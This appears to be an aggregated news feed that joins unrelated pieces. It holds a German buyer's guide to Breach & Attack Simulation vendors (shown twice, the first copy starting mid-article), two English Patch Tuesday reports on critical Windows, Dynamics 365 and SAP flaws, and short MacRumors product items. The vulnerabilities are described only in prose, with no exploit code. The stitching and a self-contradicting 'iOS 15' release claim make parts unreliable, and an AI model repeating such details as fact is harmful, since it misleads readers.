In Sachen Kundenbewertungen kann das BAS-Offering von Fortinet nicht ganz mit den ersten beiden Angeboten mithalten. Allerdings kombiniert “FortiTester” Breach & Attack Simulation mit Netzwerk-Performance-Testing und stellt insofern eine umfassende Lösung dar.
Das Fortinet-Tool simuliert diverse Angriffsarten auf Grundlage des MITRE-ATT&CK-Frameworks und unterstützt laut Expert Insights außerdem CVE-basierte IPS-Tests, sowie DDoS Traffic Generation.
Mandiant
Security-Anbieter Mandiant ist in erster Linie für seine Dienstleistungsangebote im Bereich Threat Intelligence bekannt. Die Expertise in diesem Bereich lässt das Unternehmen auch in seine BAS-Softwarelösung “Security Validation” einfließen – und hebt sich dadurch von seinen Mitbewerbern ab.
Das Mandiant-Tool unterstützt zum Beispiel MITRE ATT&CK Framework Mapping, automatisiertes Alerting sowie Environmental Drift Detection und simuliert Angriffsszenarien aus der echten Welt.
NetSPI
In Sachen Penetrationstests hat sich NetSPI bereits einen Namen gemacht. Das Unternehmen hat mit “Breach and Attack Simulation” ebenfalls eine BAS-Lösung im Angebot, die Sicherheitskontrollen validieren, Detection-Lücken identifizieren und Angriffsflächen managen kann. Das Pentesting-Knowhow von NetSPI manifestiert sich dabei insbesondere in umfassenden Support, wie Derek Wilson, leitender Security-Berater des Unternehmens, verspricht: “Unser erfahrenes Pentester-Team schließt sich mit Ihrem SOC-Team kurz und unterstützt dabei, Detections einzuordnen und Präventionsmaßnahmen zu ergreifen.”
Auch bei NetSPI soll künftig Generative AI Mehrwert für die BAS-Kunden erschließen: Künftig soll die Lösung des Anbieters dank der Technologie in der Lage sein, mehrere Datenquellen zu nutzen, um die nötigen Tests möglichst schnell zu identifizieren und zu priorisieren. Darüber hinaus stehen auch Playbooks, die auf Basis von Bedrohungsinformationen für spezifische Industrien generiert werden sowie die Simulation dynamischer Angriffsketten, um Abdeckungslücken zu identifizieren, auf dem Plan.
Picus Security
Auf Grundlage der Gartner Peer Insights ist Picus Security der BAS-Anbieter mit der zweithöchsten Kundenzufriedenheit und wurde von den Auguren mit einem “Customers Choice”-Award ausgezeichnet. Nach eigenen Angaben zählt Picus Hunderte von globalen Unternehmen zu seinen Kunden, darunter beispielsweise Mastercard oder die ING-Bankengruppe.
Die “Security Validation“-Plattform des Anbieters beinhaltet Breach & Attack Simulation, unterstützt darüber hinaus allerdings auch automatisierte Penetrationstests und Attack Surface Management sowie SOC-Optimierung und Cloud Security Posture Managenet (CSPM). Auch Picus investiert stark in KI und will künftig mit Hilfe der Technologie bessere, schnellere und umfassender personalisierte Einblicke in das Sicherheitsniveau der Anwender liefern.
Redscan
Weil Redscan auf Managed Detection and Response sowie Penetration Testing spezialisiert ist, bietet das Unternehmen einen praxisorientierten BAS-Ansatz namens “FAST Attack Simulations”. Dieser verspricht den Anwendern maßgeschneiderte Angriffssimulationen kombiniert mit Beratungsleistungen, um bei den nachfolgenden Schritten zu unterstützen.
Reliaquest
Der Anbieter Reliaquest wurde für seine Security-Plattform “GreyMatter” 2023 von Gartner in der Kategorie “Managed Detection and Response” mit einem “Customers Choice”-Award ausgezeichnet. Besonders stark ist diese Lösung im Umfeld mittelständischer Unternehmen verbreitet. Eine Funktion dieser Plattform heißt “Verify” und realisiert Breach & Attack Simulation.
Die BAS-Lösung von Reliaquest verspricht Anwendern ein umfassendes Portfolio (kuratierter) Angriffsszenarien, um möglichst zeitnah zu entsprechenden Ergebnissen zu kommen. Diese Szenarien werden zudem laufend auf Grundlage aktueller Threat-Informationen aktualisiert. Die ermittelte Bedrohungsabdeckung gleicht das Tool mit Security-Frameworks wie MITRE ATT&CK ab.
Sollten Sie diesen Anbieter ins Auge fassen, behalten Sie eines jedoch im Hinterkopf: Möglicherweise ist es im Sinne einer unabhängigen Überprüfung der Wirksamkeit von Sicherheitsmaßnahmen nicht die beste Idee, denselben Anbieter für BAS und MDR zu wählen. Andererseits könnten Anwender auch von dieser Integration profitieren.
SafeBreach
Auch der dedizierte BAS-Anbieter SafeBreach kommt bei den Peer Reviews von Gartner gut weg – auch dank seiner umfassenden Integrationsmöglichkeiten mit anderen Security-Tools. Auch in Sachen namhafte Kunden kann SafeBreach mit Netflix, PayPal, Pepsi und der Carlsberg-Gruppe überzeugen.
Die BAS-Plattform “SafeBreach” testet die Wirksamkeit bestehender Sicherheitskontrollen auf der Grundlage von mehr als 25.000 Angriffsmethoden, die dem unternehmenseigenen “Hackers Playbook” entstammen. Zudem verspricht der Anbieter, seine Plattform innerhalb von 24 Stunden um neu aufkommende Bedrohungen ergänzen zu können. Neben maßgeschneiderten Angriffssimulationen auf Grundlage des MITRE-ATT&CK-Frameworks bietet die SafeBreach-Lösung auch die Option, die voraussichtlichen Kosten für Risikominimierungsmaßnahmen zu ermitteln.
7 Fragen vor dem BAS-Invest
Forrester-Analyst Nost empfiehlt Unternehmen, ihre BAS-Journey mit einem guten Überblick über ihre Systeme und Kontrollmaßnahmen anzutreten und von “Schnellschüssen” abzusehen: “Bevor Sie nicht wissen, was Sie testen sollen, sollten Sie sich auch nicht auf ein BAS-Tool einlassen.”
Davon abgesehen empfiehlt es sich, Anbieter von Breach & Attack Simulation Tools mit den richtigen Fragen zu löchern, um vor unschönen Überraschungen verschont zu bleiben. Zum Beispiel:
Inwiefern gewährleistet Ihr Produkt verbesserte Detection-Fähigkeiten im Rahmen von Sicherheitskontrollen?
Können Tests skaliert und in Produktionsumgebungen gefahren werden – ohne größere Auswirkungen für die Kunden?
Wie sehen Ihre Research-Bemühungen mit Blick auf die neueste Bedrohungen aus?
Wie oft aktualisieren Sie ihre Threat-Bibliothek?
Können Sie anhand eines Beispiels demonstrieren, wie die Simulationsergebnisse präsentiert werden?
Sind Ihre Plattformen transparent oder ist nur Black-Box-Testing möglich?
Besteht die Option für On-Premises- oder Air-Gapped-Deployments?
Dieser Artikel ist im Original bei unserer Schwesterpublikation CSOonline.com erschienen.
View the full article
Roman Samborskyi | shutterstock.com
Lösungen im Bereich Breach & Attack Simulation (BAS) unterstützen Unternehmen dabei, ihr Sicherheitsniveau zu verstehen. Dazu automatisieren die Tools die Tests spezifischer Bedrohungsvektoren. Als Grundlage dienen dabei in der Regel das MITRE-ATT&CK– oder Cyber-Killchain-Framework. BAS-Produkte simulieren zum Beispiel:
Netzwerkangriffe und Infiltrationsversuche,
Lateral Movement,
Phishing,
Endpunkt- und Gateway-Attacken,
Malware- und Ransomware-Angriffe sowie
Insider-Bedrohungen.
Breach & Attack Simulation eingeordnet
Breach & Attack Simulation kann Red Teaming, Penetration Testing oder auch Attack Surface Assessments (ASA) ergänzen, unterscheidet sich aber deutlich von diesen Maßnahmen. Stellen Sie sich vor, Ihr Unternehmen wäre eine Villa:
Beim Red Teaming oder Penetration Testing beauftragen Sie jemanden, in Ihr Anwesen einzubrechen und Ihren Safe auszuräumen. Das Ziel: potenzielle Zugangsmöglichkeiten aufzudecken.
Breach & Attack Simulation ist hingegen, als würden Sie sämtliche Schlösser an den Türen auf Funktionstüchtigkeit prüfen und sicherstellen, dass die installierten Security-Kameras auch entsprechend reagieren, wenn sie Personen erkennen. Das Ziel: sichergehen, dass alle Kontrollmaßnahmen wie vorgesehen funktionieren.
Während sich BAS dabei auf Enterprise-Security-Kontrollen wie EDR fokussiert, werden beim Attack Surface Assessment sämtliche potenziellen Schwachstellen und Angriffsvektoren untersucht.
Das Analystenhaus Gartner fasst diese Technologien in der breiteren Kategorie “Exposure Management” zusammen. Laut den Analysten sind Lösungen im Bereich Breach & Attack Simulation vor allem in stark regulierten Branchen wie dem Banken- und Versicherungsumfeld gefragt, die mit wachsenden Compliance-Anforderungen konfrontiert sind. Diese Einschätzung kann Ilja Rabinovich, Director of Adversarial Tactics beim Sicherheitsanbieter Sygnia, nur bestätigen: “BAS-Produkte sind in der Regel teuer und werden von kleineren Unternehmen mit begrenztem Budget oder eingeschränkter Prozesslandschaft nicht angeschafft.”
Der Markt für Breach & Attack Simulation Tools
Die Auguren von Gartner prognostizieren, dass sich mehr als 40 Prozent aller Unternehmen bis zum Jahr 2026 auf konsolidierte Plattformen oder Managed Service Provider verlassen werden, wenn es um Validierungsprüfungen im Bereich Cybersecurity geht. Entsprechend breit aufgestellt präsentiert sich die BAS-Anbieterlandschaft: Sowohl Standalone-Anbieter als auch große Security-Unternehmen und Service Provider wollen ihre BAS-Lösungen an den Kunden bringen. Chirag Mehta, Analyst bei Constellation Research, sieht dabei eine weitergehende Konsolidierung des Marktes am Horizont: “Wenn Sie ein Tool haben, das Angriffe simulieren kann, ist der nächste logische Schritt, diese Attacken zu verhindern. Das erfordert allerdings, eine Reihe verschiedener Tools zu integrieren, was kein Kinderspiel ist.”
Ein wachsender Trend in diesem – wie auch allen anderen Bereichen der IT-Sicherheit – ist der Einsatz von Generative AI (GenAI). Erik Nost, Analyst bei Forrester Research, sieht diese Entwicklung positiv: “Vermutlich werden wir generative KI als erstes im Bereich des User Interface im Einsatz sehen. Mit Daten auf coole Art und Weise interagieren zu können, ist der neue GenAI-Use-Case.”
Der Analyst hält es auch für möglich, dass KI künftig auf der Basis von Daten – oder den für die Benutzer respektive das Unternehmen relevantesten Angriffsarten – Bedrohungen modelliert. Er fügt hinzu: “Generative KI könnte außerdem auch eingesetzt werden, um Unternehmen dabei zu helfen, die von BAS gefundenen Probleme zu verstehen, entsprechende Prioritäten zu setzen und spezifische Abhilfemaßnahmen vorzuschlagen.”
Das sollten BAS-Lösungen leisten
Auf folgende wichtige Features sollten Anwender bei Breach & Attack Simulation Tools achten:
Repräsentative Angriffsvektoren, um ein möglichst breites Spektrum an für das Unternehmen relevanten Angriffen simulieren zu können.
Realistische Angriffsszenarien auf Grundlage von Frameworks wie MITRE ATT&CK, die denen echter Angreifer ähneln.
Anpassbare Szenarien, um spezielle Infrastrukturaspekte testen zu können.
Automatisierte Tests, um regelmäßige und effiziente Simulationen zu realisieren, ohne den Betrieb zu beeinträchtigen oder zusätzliche personelle Ressourcen einzusetzen.
Detaillierte Reportings und Analysen, um die Bedeutung der Tests erklären und verbesserungswürdige Bereiche identifizieren zu können.
Skalierbarkeit, um nicht nur die aktuelle Unternehmensumgebung, sondern auch künftige Entwicklungen abdecken zu können.
Testmöglichkeiten für hybride Produktionsumgebungen, um Kontrollmaßnahmen unter realen Bedingungen begutachten zu können.
Einfache Nutzung und simple Deployment-Optionen, sowie Integrationsmöglichkeiten mit vorhandenen Security-Tools und -Plattformen.
Fachkundiger Support – insbesondere, wenn Sie mit Breach & Attack Simulation Tools nicht vertraut sind oder keine größeren Sicherheitsteams mit entsprechenden Erfahrungswerten einsetzen können.
Eine geeignete Kostenstruktur, da die Preismodelle von BAS-Anbietern in der Regel variieren. Die Preisstruktur sollte dem Anwendungsfall angemessen sein.
Die wichtigsten Anbieter für Breach & Attack Simulation Tools
Im Folgenden werfen wir einen Blick auf die wichtigsten Anbieter – und ihre Lösungen – im Bereich Breach & Attack Simulation. Die Auswahl basiert dabei auf Kundenrezensionen aus Gartners Peer-Insights-Ranking sowie den Einschätzungen der Spezialisten von Expert Insights.
AttackIQ
Laut Expert Insights repliziert die zentrale Emulationsplattform von AttackIQ die Taktiken, Techniken und Methoden von Angreifern im Einklang mit dem MITRE-ATT&CK-Framework. Das Angebot des Unternehmens im Bereich Breach & Attack Simulation gliedert sich in drei Optionen:
Die Managed Platform “Ready!” soll Unternehmen schneller und einfacher zu einer konsistenten Security-Validation-Strategie verhelfen.
Der agentenlose Testing Service “Flex” funktioniert On Demand und wird im Pay-as-you-Go-Modell oder auch auf monatlicher sowie jährlicher Basis abgerechnet.
Bei “Enterprise” handelt es sich um einen umfassenden Co-Managed-Service.
AttackIQ hat sich zudem einen Namen gemacht, wenn es darum geht, ML- und KI-basierte Cybersecurity-Komponenten zu testen. Nach eigener Aussage ist das Unternehmen zudem der einzige BAS-Anbieter, der sowohl Self-Service- als auch Full-Service-Lösungen anbietet. Künftig soll künstliche Intelligenz Attack-IQ-Kunden außerdem verstärkt dabei unterstützen, Sicherheitslücken automatisiert zu identifizieren und zu beheben.
Cymulate
Cymulate gehört nicht nur laut Expert Insights zu den führenden Anbietern für Continuous Threat Exposure Management, sondern ist auch der Anbieter mit den besten Kundenbewertungen bei Gartners Peer Insights – auch dank der guten User Experience. Die “Breach and Attack (BAS)”-Lösung von Cymulate wird im SaaS-Modell bereitgestellt. Für Unternehmen mit Data-Segregation-Bedürfnissen steht auch eine Private-Tenancy-Option zur Verfügung. Wie AttackIQ verwendet Cymulate das MITRE ATT&CK Framework als Grundlage.
Laut dem Anbieter dauert es derzeit circa drei bis vier Wochen, um die Integrationen einzurichten und sein BAS-Tool einzusetzen. Diesen Zeitraum möchte Cymulate künftig mit Hilfe von Generative AI auf wenige Minuten reduzieren. Doch die GenAI-Pläne des Anbieters gehen noch weiter: Die Technologie soll künftig automatisiert aus Tausenden oder gar Hunderttausenden verschiedenen Angriffsszenarien Mitigationsstrategien entwickeln können – und den Security-Teams erklären, wie diese umzusetzen sind. Die GenAI-Funktionen sollen laut Cymulate bis Ende Oktober 2024 in vollem Umfang zur Verfügung stehen.
Fortinet
In Sachen Kundenbewertungen kann das BAS-Offering von Fortinet nicht ganz mit den ersten beiden Angeboten mithalten. Allerdings kombiniert “FortiTester” Breach & Attack Simulation mit Netzwerk-Performance-Testing und stellt insofern eine umfassende Lösung dar.
Das Fortinet-Tool simuliert diverse Angriffsarten auf Grundlage des MITRE-ATT&CK-Frameworks und unterstützt laut Expert Insights außerdem CVE-basierte IPS-Tests, sowie DDoS Traffic Generation.
Mandiant
Security-Anbieter Mandiant ist in erster Linie für seine Dienstleistungsangebote im Bereich Threat Intelligence bekannt. Die Expertise in diesem Bereich lässt das Unternehmen auch in seine BAS-Softwarelösung “Security Validation” einfließen – und hebt sich dadurch von seinen Mitbewerbern ab.
Das Mandiant-Tool unterstützt zum Beispiel MITRE ATT&CK Framework Mapping, automatisiertes Alerting sowie Environmental Drift Detection und simuliert Angriffsszenarien aus der echten Welt.
NetSPI
In Sachen Penetrationstests hat sich NetSPI bereits einen Namen gemacht. Das Unternehmen hat mit “Breach and Attack Simulation” ebenfalls eine BAS-Lösung im Angebot, die Sicherheitskontrollen validieren, Detection-Lücken identifizieren und Angriffsflächen managen kann. Das Pentesting-Knowhow von NetSPI manifestiert sich dabei insbesondere in umfassenden Support, wie Derek Wilson, leitender Security-Berater des Unternehmens, verspricht: “Unser erfahrenes Pentester-Team schließt sich mit Ihrem SOC-Team kurz und unterstützt dabei, Detections einzuordnen und Präventionsmaßnahmen zu ergreifen.”
Auch bei NetSPI soll künftig Generative AI Mehrwert für die BAS-Kunden erschließen: Künftig soll die Lösung des Anbieters dank der Technologie in der Lage sein, mehrere Datenquellen zu nutzen, um die nötigen Tests möglichst schnell zu identifizieren und zu priorisieren. Darüber hinaus stehen auch Playbooks, die auf Basis von Bedrohungsinformationen für spezifische Industrien generiert werden sowie die Simulation dynamischer Angriffsketten, um Abdeckungslücken zu identifizieren, auf dem Plan.
Picus Security
Auf Grundlage der Gartner Peer Insights ist Picus Security der BAS-Anbieter mit der zweithöchsten Kundenzufriedenheit und wurde von den Auguren mit einem “Customers Choice”-Award ausgezeichnet. Nach eigenen Angaben zählt Picus Hunderte von globalen Unternehmen zu seinen Kunden, darunter beispielsweise Mastercard oder die ING-Bankengruppe.
Die “Security Validation“-Plattform des Anbieters beinhaltet Breach & Attack Simulation, unterstützt darüber hinaus allerdings auch automatisierte Penetrationstests und Attack Surface Management sowie SOC-Optimierung und Cloud Security Posture Managenet (CSPM). Auch Picus investiert stark in KI und will künftig mit Hilfe der Technologie bessere, schnellere und umfassender personalisierte Einblicke in das Sicherheitsniveau der Anwender liefern.
Redscan
Weil Redscan auf Managed Detection and Response sowie Penetration Testing spezialisiert ist, bietet das Unternehmen einen praxisorientierten BAS-Ansatz namens “FAST Attack Simulations”. Dieser verspricht den Anwendern maßgeschneiderte Angriffssimulationen kombiniert mit Beratungsleistungen, um bei den nachfolgenden Schritten zu unterstützen.
Reliaquest
Der Anbieter Reliaquest wurde für seine Security-Plattform “GreyMatter” 2023 von Gartner in der Kategorie “Managed Detection and Response” mit einem “Customers Choice”-Award ausgezeichnet. Besonders stark ist diese Lösung im Umfeld mittelständischer Unternehmen verbreitet. Eine Funktion dieser Plattform heißt “Verify” und realisiert Breach & Attack Simulation.
Die BAS-Lösung von Reliaquest verspricht Anwendern ein umfassendes Portfolio (kuratierter) Angriffsszenarien, um möglichst zeitnah zu entsprechenden Ergebnissen zu kommen. Diese Szenarien werden zudem laufend auf Grundlage aktueller Threat-Informationen aktualisiert. Die ermittelte Bedrohungsabdeckung gleicht das Tool mit Security-Frameworks wie MITRE ATT&CK ab.
Sollten Sie diesen Anbieter ins Auge fassen, behalten Sie eines jedoch im Hinterkopf: Möglicherweise ist es im Sinne einer unabhängigen Überprüfung der Wirksamkeit von Sicherheitsmaßnahmen nicht die beste Idee, denselben Anbieter für BAS und MDR zu wählen. Andererseits könnten Anwender auch von dieser Integration profitieren.
SafeBreach
Auch der dedizierte BAS-Anbieter SafeBreach kommt bei den Peer Reviews von Gartner gut weg – auch dank seiner umfassenden Integrationsmöglichkeiten mit anderen Security-Tools. Auch in Sachen namhafte Kunden kann SafeBreach mit Netflix, PayPal, Pepsi und der Carlsberg-Gruppe überzeugen.
Die BAS-Plattform “SafeBreach” testet die Wirksamkeit bestehender Sicherheitskontrollen auf der Grundlage von mehr als 25.000 Angriffsmethoden, die dem unternehmenseigenen “Hackers Playbook” entstammen. Zudem verspricht der Anbieter, seine Plattform innerhalb von 24 Stunden um neu aufkommende Bedrohungen ergänzen zu können. Neben maßgeschneiderten Angriffssimulationen auf Grundlage des MITRE-ATT&CK-Frameworks bietet die SafeBreach-Lösung auch die Option, die voraussichtlichen Kosten für Risikominimierungsmaßnahmen zu ermitteln.
7 Fragen vor dem BAS-Invest
Forrester-Analyst Nost empfiehlt Unternehmen, ihre BAS-Journey mit einem guten Überblick über ihre Systeme und Kontrollmaßnahmen anzutreten und von “Schnellschüssen” abzusehen: “Bevor Sie nicht wissen, was Sie testen sollen, sollten Sie sich auch nicht auf ein BAS-Tool einlassen.”
Davon abgesehen empfiehlt es sich, Anbieter von Breach & Attack Simulation Tools mit den richtigen Fragen zu löchern, um vor unschönen Überraschungen verschont zu bleiben. Zum Beispiel:
Inwiefern gewährleistet Ihr Produkt verbesserte Detection-Fähigkeiten im Rahmen von Sicherheitskontrollen?
Können Tests skaliert und in Produktionsumgebungen gefahren werden – ohne größere Auswirkungen für die Kunden?
Wie sehen Ihre Research-Bemühungen mit Blick auf die neueste Bedrohungen aus?
Wie oft aktualisieren Sie ihre Threat-Bibliothek?
Können Sie anhand eines Beispiels demonstrieren, wie die Simulationsergebnisse präsentiert werden?
Sind Ihre Plattformen transparent oder ist nur Black-Box-Testing möglich?
Besteht die Option für On-Premises- oder Air-Gapped-Deployments?
Dieser Artikel ist im Original bei unserer Schwesterpublikation CSOonline.com erschienen.
View the full article
Critical vulnerabilities in Windows Server’s networking and identity infrastructure, as well as a serious hole in Microsoft Dynamics 365 on-premises version, highlight Microsoft’s May Patch Tuesday fixes.
They are among the 118 vulnerabilities identified this month by the company. Some in cloud-based services like Azure and Microsoft Teams have already been fixed, so no admin action is needed.
But among the most severe that CSOs need to pay attention to is yet another hole in Windows Netlogon service, CVE-2026-41089, which has a CVSS score of 9.8. It requires no authentication or user interaction to be exploited.
Netlogon vulnerabilities date back to at least 2020, when a vulnerability dubbed Zerologon was found. In 2025 Microsoft fixed a denial of service vulnerability in which a remote unauthenticated user could make a series of Netlogon-based remote procedure calls that could consume all memory on a domain controller.
“The Netlogon vulnerability directly impacts domain controllers and identity infrastructure,” Jack Bicer, director of vulnerability research at Action1, told CSO, “creating risk of domain level compromise, credential theft, ransomware deployment, and operational outages.”
This vulnerability could impact Windows Server versions back to 2016.
Another critical vulnerability is in Windows Server’s DNS Client, CVE-2026-41096, also with a CVSS score of 9.8. It could allow remote code execution through specially crafted DNS responses. Bicer said this creates the potential for widespread endpoint compromise across enterprise networks.
“While Microsoft currently assesses exploitation likelihood as lower,” he said, “the strategic importance of DNS and Active Directory services significantly elevates the organizational risk associated with delayed patching.” 
Chris Goettl, VP of product management at Ivanti, said that from a static analysis perspective, these two vulnerabilities “definitely look like a good opportunity for threat actors. The vulnerabilities are not currently exploited or publicly disclosed, but organizations should be sure to prioritize OS updates in a timely manner.”
He added, “additional layers of protection through network segmentation, access restrictions and monitoring should limit the exposure within an enterprise. That being said, these vulnerabilities are out there. Average time to an N-day exploit is around five days currently. Organizations may choose to prioritize critical parts of their infrastructure ahead of the rest of their infrastructure to shorten that exposure window in case of an exploit in the near future.”
Severe hole in Dynamics 365
The most severe issue this month, Bicer said, is CVE-2026-42898 affecting Microsoft Dynamics 365 On Premises. A remote code execution vulnerability with a CVSS score of 9.9, it allows a low privileged authenticated attacker to execute arbitrary code remotely through manipulated process session data.
“Because Dynamics 365 environments frequently integrate with identity providers, financial systems, and operational business workflows, compromise of these platforms could rapidly expand into broader enterprise compromise,” Bicer said. “Organizations operating customer relationship management infrastructure should prioritize remediation immediately to reduce the risk of operational disruption and unauthorized access to sensitive business records.” 
SSO plugin flaw
Satnam Narang, senior staff research engineer at Tenable, drew attention to a critical elevation of privilege vulnerability in the Microsoft’s single-sign-on (SSO) plugin for Atlassian’s Jira project management and Confluence collaboration suites (CVE-2026-41103). During the login process, he explained, an attacker could send a specially crafted response message to exploit this flaw. Exploitation would allow the attacker to sign in using a forged identity, without Microsoft Entra ID authentication.
This would allow the attacker to access or modify data in Jira or Confluence, which he described as rich sources of sensitive information for many organizations. However, Narang pointed out, the accessible information would be limited by the access defined by the targeted servers for the authorized user.
Tyler Reguly, associate director for security R&D at Fortra, noted that the admins responsible for Confluence and Jira may not be the same people responsible for Microsoft products, so the crossover of this vulnerability may cause it to be entirely overlooked. CSOs should stay on top of their teams with this one, he advised.
Critical non-CVE update
Rain Baker, senior incident response specialist for the ShadowScout team at Nightwing, pointed out that the most critical non-CVE update involves the mandatory rollout of updated Secure Boot certificates. Devices failing to receive these updates before the June 26 deadline face “catastrophic boot-level security failures” or degraded security states, he said.
“Ensure your entire fleet successfully rotates to the new trust anchors before June 26,” he said. “For those who haven’t patched for last month’s releases for the Windows Shell and Microsoft Defender bypass flaws, it is imperative that security teams give these the highest priority.” 
SAP patches and Oracle updates
SAP issued two HotNews Notes, two High Priority Notes and 12 Medium Priority Notes.
One of the HotNews Notes is #3724838 (it’s also CVE-2026-34260, with a CVSS score of 9.6). It patches an SQL injection vulnerability in SAP S/4HANA’s Enterprise Search for ABAP. Researchers at Onapsis said that, due to improper or missing input validation and sanitization, an authenticated attacker is able to inject malicious SQL statements through user-controlled input, with high impact on the confidentiality and availability of the application. “Fortunately,” Onapsis said, “the affected source code only allows read access to data, so that integrity is not impacted.”
Still, Jonathan Stross, SAP security analyst at Pathlock, said that if you run Enterprise Search for ABAP “this is the most important technical vulnerability of the month. It allows a low-privileged authenticated attacker to inject malicious SQL through user-controlled input, potentially exposing sensitive database information and crashing the application.”
He added that for organizations using S/4HANA broadly across finance, procurement, supply chain, or HR-adjacent processes, this should be treated as an urgent remediation item.
SAP stated that there is no workaround, Stross pointed out, so remediation depends on implementing the referenced correction instructions or support packages. 
The other HotNews note is #3733064, with a CVSS score of 9.6, which patches a missing authentication check vulnerability in SAP Commerce Cloud. Onapsis says the vulnerability is caused by an overly permissive security configuration with improper rule ordering, allowing an unauthenticated user to perform malicious configuration upload and code injection, resulting in arbitrary server-side code execution.
“This is one of the highest business-risk items of the month,” said Stross, “because Commerce Cloud environments are frequently exposed beyond the internal corporate network. A successful exploit could affect storefront availability, customer data, order flows, pricing logic, integrations, and trust in the commerce platform.”
Finally, Oracle admins should note that the company is switching to releasing monthly security patches. The first will come on May 28, which is the fourth Thursday of the month. However, after that the patches will come on the third Tuesday of each month. 
View the full article
Google today announced a new series of Googlebook laptops that will be built with Gemini at the core. Googlebooks will run software built on a foundation that combines Android and ChromeOS.


Google says the new laptops are designed for Gemini Intelligence for a more personalized and proactive experience.

Instead of a cursor, Googlebooks have a Magic Pointer that users can wiggle to activate Gemini. Gemini can then provide contextual suggestions and answers based on whatever the user is pointing to on the screen. Pointing at a date in an email sets up a meeting, and selecting two images allows them to be visualized together. There are ask, compare, and combine tools available with the Magic Pointer.

Create My Widget, a new Android feature, is coming to Googlebooks. Users can create custom widgets with a Gemini prompt. Gemini is able to search the internet and connect with Google apps like Gmail and Calendar to create a personalized dashboard that can be used for widget creation.


Since Googlebooks will run Android, it will be easier to switch between a Googlebook and an Android smartphone. Apps from a connected Android smartphone will be available on the Googlebook, with a feature set similar to Apple's iPhone Mirroring.

Quick Access will let users view, search, or insert files from a smartphone on the laptop, with no transfer needed.

Google says it is working with Acer, ASUS, Dell, HP, and Lenovo to make the first Googlebooks. The machines will be built with "premium craftsmanship and materials, coming in a variety of shapes and sizes." Each one will have a "glowbar" on the lid, making it clear that it's a Googlebook.

Google has not given insight into Googlebook pricing, but with the specific "premium" build language, they could be priced above the low-cost MacBook Neo that Apple recently came out with. It's also possible that Googlebooks will have MacBook Neo-level pricing to better compete with Apple's laptop in on pricing and build quality.

The first Googlebooks are set to launch this fall.Tags: Android, Google
This article, "Google Unveils Googlebook, a New AI Laptop Built Around Gemini" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Popular Mac menu bar management app Bartender received an upgrade today with the launch of Bartender Pro. Bartender Pro adds a new Top Shelf feature to the Mac's notch, with access to multiple utility tools.


Top Shelf can be used for clipboard access, storing files, controlling audio, and sending content over AirDrop. It supports widgets for calendar, weather, and music apps like Apple Music or Spotify. There's a full Now Playing music controller, and options to get alerts when scheduled events are coming up.


Top Shelf expands the size of the notch, turning it into something like the iPhone's Dynamic Island. Users can drag files over to the notch to store them or send them via AirDrop, and access a clipboard. The clipboard can be set to automatically capture content that's copied, with options to ignore passwords. There are customizable duration options for both the clipboard and file storage.


Widgets in Top Shelf are customizable, and it supports a Live Activity-like tracking feature for AI agents like Codex and Claude Code. Info like volume, display brightness, and battery level is also available.

Top Shelf works alongside Bartender, and all of the standard Bartender features are available with Bartender Pro. When not in use, Top Shelf is tucked away much like Bartender, and it disappears when Bartender is expanded. While it is a tool designed around the notch, it also works on Macs that don't have one.


Bartender Pro is optional, and users who don't need the extra features can stick with Bartender 6.

Bartender Pro is priced at $15 per year. The subscription includes Bartender 6, all future upgrades for the subscription duration, and the Bartender Pro suite.

Bartender 6 is still available for a one-time $20 purchase, and the $80 Mega Supporter option continues to offer lifetime Bartender access with Bartender Pro included. Bartender Pro and Bartender 6 are available from the Bartender website.Tag: Widgets
This article, "Bartender Pro Brings Widgets, Clipboard, and File Storage to the MacBook Notch" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code. That reality is on full display this month with some of the more widely-used software makers — including Apple, Google, Microsoft, Mozilla and Oracle — fixing near record volumes of security bugs, and/or quickening the tempo of their patch releases.
As it does on the second Tuesday of every month, Microsoft today released software updates to address at least 118 security vulnerabilities in its various Windows operating systems and other products. Remarkably, this is the first Patch Tuesday in nearly two years that Microsoft is not shipping any fixes to deal with emergency zero-day flaws that are already being exploited. Nor have any of the flaws fixed today been previously disclosed (potentially giving attackers a heads up in how to exploit the weakness).
Sixteen of the vulnerabilities earned Microsoft’s most-dire “critical” label, meaning malware or miscreants could abuse these bugs to seize remote control over a vulnerable Windows device with little or no help from the user. Rapid7 has done much of the heavy lifting today in identifying some of the more concerning critical weaknesses this month, including:
CVE-2026-41089: A critical stack-based buffer overflow in Windows Netlogon that offers an attacker SYSTEM privileges on the domain controller. No privileges or user interaction are required, and attack complexity is low. Patches are available for all versions of Windows Server from 2012 onwards. CVE-2026-41096: A critical RCE in the Windows DNS client implementation worthy of attention despite Microsoft assessing exploitation as less likely. CVE-2026-41103: A critical elevation of privilege vulnerability that allows an unauthorized attacker to impersonate an existing user by presenting forged credentials, thus bypassing Entra ID. Microsoft expects that exploitation is more likely. May’s Patch Tuesday is a welcome respite from April, which saw Microsoft fix a near-record 167 security flaws. Microsoft was among a few dozen tech giants given access to a “Project Glasswing,” a much-hyped AI capability developed by Anthropic that appears quite effective at unearthing security vulnerabilities in code.
Apple, another early participant in Project Glasswing, typically fixes an average of 20 vulnerabilities each time it ships a security update for iOS devices, said Chris Goettl, vice president of product management at Ivanti. On May 11, Apple shipped iOS 15, which addressed at least 52 vulnerabilities and backported the changes all the way to iPhone 6s and iOS 15.
Last month, Mozilla released Firefox 150, which resolved a whopping 271 vulnerabilities that were reportedly discovered during the Glasswing evaluation.
“Since Firefox 150.0.0 released, they have been on a more aggressive weekly cadence for security updates including the release of Firefox 150.0.3 on May Patch Tuesday resolving between three to five CVEs in each release,” Goettl said.
The software giant Oracle likewise recently increased its patch pace in response to their work with Glasswing. In its most recent quarterly patch update, Oracle addressed at least 450 flaws, including more than 300 fixes for remotely exploitable, unauthenticated flaws. But at the end of April, Oracle announced it was switching to a monthly update cycle for critical security issues.
On May 8, Google started rolling out updates to its Chrome browser that fixed an astonishing 127 security flaws (up from just 30 the previous month). Chrome automagically downloads available security updates, but installing them requires fully restarting the browser.
If you encounter any weirdness applying the updates from Microsoft or any other vendor mentioned here, feel free to sound off in the comments below. Meantime, if you haven’t backed up your data and/or drive lately, doing that before updating is generally sound advice. For a more granular look at the Microsoft updates released today, checkout this inventory by the SANS Internet Storm Center.
View the full article
Google today said it is introducing updated file sharing features that will make it easier for Android users to send files to iPhone users.


Quick Share is already compatible with Apple's AirDrop feature on select Android devices, but Google says the feature will expand to Samsung, OPPO, OnePlus, Vivo, Xiaomi, and HONOR devices in 2026.

